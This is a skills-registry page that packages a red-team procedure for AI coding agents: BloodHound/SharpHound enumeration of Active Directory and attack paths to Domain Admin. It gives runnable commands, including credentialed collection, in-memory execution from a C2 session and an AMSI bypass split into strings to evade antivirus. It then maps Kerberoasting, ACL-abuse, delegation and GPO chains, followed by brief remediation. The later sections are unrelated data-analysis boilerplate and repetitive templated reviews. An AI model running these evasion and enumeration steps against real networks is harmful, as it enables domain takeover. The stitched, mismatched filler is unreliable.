performing-active-directory-bloodhound-analysis▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Use BloodHound and SharpHound to enumerate Active Directory relationships and identify attack paths from compromised users to Domain Admin.
| name | performing-active-directory-bloodhound-analysis |
| description | Use BloodHound and SharpHound to enumerate Active Directory relationships and identify attack paths from compromised users to Domain Admin. |
| domain | cybersecurity |
| subdomain | red-teaming |
| tags | - bloodhound - active-directory - sharphound - attack-path - ad-enumeration - graph-theory - privilege-escalation |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| d3fend_techniques | - Restore Access - Password Authentication - Biometric Authentication - Strong Password Policy - Restore User Account Access |
| nist_csf | - ID.RA-01 - GV.OV-02 - DE.AE-07 |
Performing Active Directory BloodHound Analysis
Overview
BloodHound is an open-source Active Directory reconnaissance tool that uses graph theory to reveal hidden relationships, attack paths, and privilege escalation opportunities within AD environments. By collecting data with SharpHound (or AzureHound for Azure AD), BloodHound visualizes how an attacker can escalate from a low-privilege user to Domain Admin through chains of misconfigurations, group memberships, ACL abuses, and trust relationships. MITRE ATT&CK classifies BloodHound as software S0521.
When to Use
- When conducting security assessments that involve performing active directory bloodhound analysis
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
Prerequisites
- Initial foothold on a domain-joined Windows system (or valid domain credentials)
- BloodHound CE (Community Edition) or BloodHound Legacy 4.x installed
- SharpHound collector (C# binary or PowerShell module)
- Neo4j database (Legacy) or PostgreSQL (CE)
- Network access to domain controllers (LDAP TCP/389, LDAPS TCP/636)
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
| Technique ID | Name | Tactic |
|---|---|---|
| T1087.002 | Account Discovery: Domain Account | Discovery |
| T1069.002 | Permission Groups Discovery: Domain Groups | Discovery |
| T1018 | Remote System Discovery | Discovery |
| T1482 | Domain Trust Discovery | Discovery |
| T1615 | Group Policy Discovery | Discovery |
| T1069.001 | Permission Groups Discovery: Local Groups | Discovery |
Step 1: Data Collection with SharpHound
SharpHound.exe (Preferred for OPSEC)
# Collect all data types (Users, Groups, Computers, Sessions, ACLs, Trusts, GPOs)
.\SharpHound.exe -c All --outputdirectory C:\Temp --zipfilename bloodhound_data.zip
# Stealth mode - collect only structure data (no session enumeration)
.\SharpHound.exe -c DCOnly --outputdirectory C:\Temp
# Collect with specific domain and credentials
.\SharpHound.exe -c All -d corp.local --ldapusername svc_enum --ldappassword Password123
# Loop collection - collect sessions over time for better coverage
.\SharpHound.exe -c Session --loop --loopduration 02:00:00 --loopinterval 00:05:00
# Collect from Havoc C2 Demon session (in-memory)
dotnet inline-execute /tools/SharpHound.exe -c All --memcache --outputdirectory C:\Temp
Invoke-BloodHound (PowerShell)
# Import and run
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -ZipFileName bh.zip
# AMSI bypass before loading (if needed) — strings split to avoid AV signature matching
$t = 'System.Management.Automation.Am' + 'siUtils'
[Ref].Assembly.GetType($t).GetField(('am' + 'siInitFailed'),'NonPublic,Static').SetValue($null,$true)
AzureHound (Azure AD)
# Collect Azure AD data
azurehound list -t <tenant-id> --refresh-token <token> -o azure_data.json
# Or using AzureHound PowerShell
Import-Module .\AzureHound.ps1
Invoke-AzureHound
Step 2: Import Data into BloodHound
BloodHound CE (v5+)
# Start BloodHound CE with Docker
curl -L https://ghst.ly/getbhce | docker compose -f - up
# Access web interface at https://localhost:8080
# Default credentials: admin / bloodhound
# Upload ZIP file via GUI: Upload Data > Select File
BloodHound Legacy
# Start Neo4j
sudo neo4j start
# Access Neo4j at http://localhost:7474 (default neo4j:neo4j)
# Start BloodHound GUI
./BloodHound --no-sandbox
# Drag and drop ZIP file into BloodHound GUI
Step 3: Attack Path Analysis
Pre-Built Queries (Most Critical)
-- Find all Domain Admins
MATCH (n:Group) WHERE n.name =~ '(?i).*domain admins.*' RETURN n
-- Shortest path from owned user to Domain Admin
MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:'DOMAIN [email protected]'}))
RETURN p
-- Find Kerberoastable users with path to DA
MATCH (u:User {hasspn:true})
MATCH p=shortestPath((u)-[*1..]->(g:Group {name:'DOMAIN [email protected]'}))
RETURN p
-- Find AS-REP Roastable users
MATCH (u:User {dontreqpreauth:true}) RETURN u.name, u.displayname
-- Users with DCSync rights
MATCH p=(n1)-[:MemberOf|GetChanges*1..]->(u:Domain)
MATCH p2=(n1)-[:MemberOf|GetChangesAll*1..]->(u)
RETURN n1.name
-- Find computers where Domain Users are local admin
MATCH p=(m:Group {name:'DOMAIN [email protected]'})-[:AdminTo]->(c:Computer) RETURN p
-- Find unconstrained delegation computers
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name
-- Find constrained delegation abuse paths
MATCH (u) WHERE u.allowedtodelegate IS NOT NULL RETURN u.name, u.allowedtodelegate
-- GPO abuse paths
MATCH p=(g:GPO)-[r:GpLink]->(ou:OU)-[r2:Contains*1..]->(c:Computer)
RETURN p LIMIT 50
-- Find all sessions on high-value targets
MATCH (c:Computer)-[:HasSession]->(u:User)-[:MemberOf*1..]->(g:Group {highvalue:true})
RETURN c.name, u.name, g.name
Custom Cypher Queries
-- Find users with GenericAll on other users (password reset path)
MATCH p=(u1:User)-[:GenericAll]->(u2:User) RETURN u1.name, u2.name
-- Find WriteDACL paths (ACL abuse)
MATCH p=(n)-[:WriteDacl]->(m) WHERE n<>m RETURN p LIMIT 50
-- Find AddMember rights to privileged groups
MATCH p=(n)-[:AddMember]->(g:Group {highvalue:true}) RETURN n.name, g.name
-- Map trust relationships
MATCH p=(d1:Domain)-[:TrustedBy]->(d2:Domain) RETURN d1.name, d2.name
-- Find service accounts with admin access
MATCH (u:User {hasspn:true})-[:AdminTo]->(c:Computer) RETURN u.name, c.name
Step 4: Common Attack Paths
Path 1: Kerberoasting to DA
User (owned) -> Kerberoastable SVC Account -> Crack Hash -> SVC is AdminTo Server ->
Server HasSession DA -> Steal Token -> Domain Admin
Path 2: ACL Abuse Chain
User (owned) -> GenericAll on User2 -> Reset Password -> User2 MemberOf ->
IT Admins -> AdminTo DC -> Domain Admin
Path 3: Unconstrained Delegation
User (owned) -> AdminTo Server (Unconstrained Delegation) ->
Coerce DC Auth (PrinterBug/PetitPotam) -> Capture TGT -> DCSync
Path 4: GPO Abuse
User (owned) -> GenericWrite on GPO -> Modify GPO -> Scheduled Task on OU Computers ->
Code Execution as SYSTEM
Step 5: Remediation Recommendations
| Finding | Risk | Remediation |
|---|---|---|
| Kerberoastable DA | Critical | Use gMSA, rotate passwords, AES-only |
| Unconstrained Delegation | Critical | Migrate to constrained/RBCD delegation |
| Domain Users local admin | High | Remove DA from local admin, use LAPS |
| Excessive ACL permissions | High | Audit and reduce GenericAll/WriteDACL |
| Stale admin sessions | Medium | Implement session cleanup, restrict RDP |
| Cross-domain trust abuse | High | Review trust direction and SID filtering |
References
- BloodHound GitHub: https://github.com/BloodHoundAD/BloodHound
- BloodHound CE: https://github.com/SpecterOps/BloodHound
- SharpHound: https://github.com/BloodHoundAD/SharpHound
- MITRE ATT&CK S0521: https://attack.mitre.org/software/S0521/
- SpecterOps BloodHound Documentation: https://bloodhound.readthedocs.io/
How to use performing-active-directory-bloodhound-analysis on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add performing-active-directory-bloodhound-analysis
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches performing-active-directory-bloodhound-analysis from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate performing-active-directory-bloodhound-analysis. Access the skill through slash commands (e.g., /performing-active-directory-bloodhound-analysis) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Exploratory Data Analysis
Quickly understand datasets, identify patterns, and generate insights
Example
Analyze CSV with 100K rows, identify outliers, visualize correlations, suggest hypotheses
Reduce EDA time from hours to minutes, uncover insights faster
Data Cleaning & Transformation
Write scripts to clean messy data, handle missing values, normalize formats
Example
Generate Python/SQL to fix date formats, impute missing values, remove duplicates
Automate 80% of data preprocessing work
Statistical Analysis
Perform hypothesis testing, regression, and statistical modeling
Example
Run A/B test analysis, calculate confidence intervals, interpret p-values
Get statistically sound analysis without PhD in statistics
Data Visualization
Create charts, dashboards, and visual reports
Example
Generate matplotlib/seaborn code for time series plots, distribution charts, heatmaps
Build presentation-ready visualizations 3x faster
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client
- ›Python environment (pandas, numpy, matplotlib) or SQL database access
- ›Basic understanding of data analysis concepts
- ›Sample datasets for testing skill capabilities
Time Estimate
20-40 minutes to set up and run first analysis
Installation Steps
- 1.Install data analysis skill using provided command
- 2.Prepare a sample dataset (CSV, JSON, or database connection)
- 3.Start with descriptive statistics: 'Summarize this dataset'
- 4.Progress to visualization: 'Create a scatter plot of X vs Y'
- 5.Advanced analysis: 'Run linear regression and interpret results'
- 6.Validate outputs: check calculations, verify visualizations make sense
- 7.Document analysis workflow for reproducibility
Common Pitfalls
- ⚠Not validating statistical assumptions before applying tests
- ⚠Accepting visualizations without checking data accuracy
- ⚠Overlooking data quality issues (missing values, outliers)
- ⚠Misinterpreting correlation as causation
- ⚠Using wrong statistical test for data distribution
- ⚠Not considering sample size and statistical power
Best Practices▌
✓ Do
- +Always validate data quality before analysis
- +Check statistical assumptions (normality, independence, etc.)
- +Visualize data before running statistical tests
- +Document analysis steps for reproducibility
- +Cross-validate findings with domain experts
- +Use skill for initial exploration, then dive deeper manually
- +Save generated code for reuse on similar datasets
✗ Don't
- −Don't trust analysis without verifying data quality
- −Don't apply statistical tests without checking assumptions
- −Don't make business decisions solely on AI-generated analysis
- −Don't ignore outliers without investigating cause
- −Don't skip data validation and sanity checks
- −Don't use for mission-critical financial or medical analysis without expert review
💡 Pro Tips
- ★Describe data context: 'This is user behavior data from e-commerce site'
- ★Ask for interpretation: 'What does this correlation mean for business?'
- ★Request multiple approaches: 'Show 3 ways to handle missing data'
- ★Combine AI analysis with domain expertise for best insights
- ★Use for rapid prototyping, then refine analysis manually
When to Use This▌
✓ Use When
Use for exploratory data analysis, data cleaning, statistical testing, visualization prototyping, and learning new analysis techniques. Best for initial exploration and rapid insights.
✗ Avoid When
Avoid for mission-critical financial analysis, medical research requiring regulatory compliance, production ML models, or when deep statistical expertise is required for nuanced interpretation.
Learning Path▌
- 1Basic: descriptive statistics, data cleaning, simple visualizations
- 2Intermediate: hypothesis testing, regression, correlation analysis
- 3Advanced: time series analysis, clustering, predictive modeling
- 4Expert: causal inference, experimental design, advanced statistical methods
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.7★★★★★39 reviews- ★★★★★Valentina Bhatia· Dec 28, 2024
performing-active-directory-bloodhound-analysis has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Carlos Mehta· Dec 8, 2024
performing-active-directory-bloodhound-analysis is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Anika Zhang· Nov 27, 2024
Solid pick for teams standardizing on skills: performing-active-directory-bloodhound-analysis is focused, and the summary matches what you get after install.
- ★★★★★Xiao Tandon· Nov 19, 2024
Keeps context tight: performing-active-directory-bloodhound-analysis is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Yash Thakker· Nov 15, 2024
We added performing-active-directory-bloodhound-analysis from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
- ★★★★★Kofi Chen· Nov 15, 2024
We added performing-active-directory-bloodhound-analysis from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
- ★★★★★Yuki Patel· Oct 18, 2024
performing-active-directory-bloodhound-analysis has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Anika Liu· Oct 10, 2024
performing-active-directory-bloodhound-analysis is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Dhruvi Jain· Oct 6, 2024
performing-active-directory-bloodhound-analysis fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Jin Desai· Oct 6, 2024
performing-active-directory-bloodhound-analysis fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
showing 1-10 of 39